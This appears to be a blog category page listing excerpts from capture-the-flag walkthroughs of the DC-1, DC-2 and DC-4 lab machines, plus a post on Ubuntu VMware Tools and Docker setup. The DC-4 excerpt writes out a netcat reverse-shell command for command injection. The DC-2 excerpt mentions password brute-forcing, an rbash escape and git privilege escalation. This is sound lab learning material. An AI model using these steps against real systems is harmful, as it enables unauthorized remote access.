Linux
文章平均质量分 84
摘星怪sec
时光荏苒,流年似水
展开
-
靶机DC-4
nc -e /bin/bash 192.168.56.128 8086(nc+-e+/bin/bash+192.168.56.128+8086)空格用+号代替,也可以直接进行url编码。小结:用到的用户也就是jim和charles,要是前者能提权就省事了,不过靶机都是有提示,都是最后要提权,估计后面的靶机提权也不重样。去邮箱看到:/var/spool/mail 这里是前面提到的三个用户的:charles,以及给了密码:^xHhA&hvim0y。查看mbox的内容,看到有邮箱提示:来自root用户的信。原创 2024-07-17 00:21:24 · 347 阅读 · 0 评论 -
靶机DC-2
唯一有用的就只有vi(编辑器)这个命令,这里可以里用vi或者是BASH_CMDS设置shell来绕过rbash,然后再设置环境变量添加命令。已经升级为bash了,无法执行cat命令是因为环境变量的问题,用以下命令添加一下两条路径即可。后台登录地址,弱密码没爆破出来,结合上面的用 cewl生成字典。提示我们得su一下jerry,su是Linux切换用户的命令。得到flag4,提示git,还有root看来是要提权的操作。发现git能使用root的权限,这里有两种提权的姿势。爆破出了jerry和tom的密码。原创 2024-07-13 17:06:11 · 808 阅读 · 0 评论 -
靶机DC-1
如果是虚拟机打开报错,可以尝试一下更改。原创 2024-07-12 20:37:06 · 743 阅读 · 0 评论 -
Ubuntu安装vmtools,dokcer及换源
此时桌面有vmtoolsCD盘,双击打开盘,然后将文件复制到或者提取到你要存放文件的目录下。2、解压文件进入目录执行安装,这里输入yes使用默认安装路径只要出现路径的就按下回车,出现【Yes/No】全部选择Yes。出现安装成功,重启即可。原创 2023-06-05 18:25:12 · 200 阅读 · 0 评论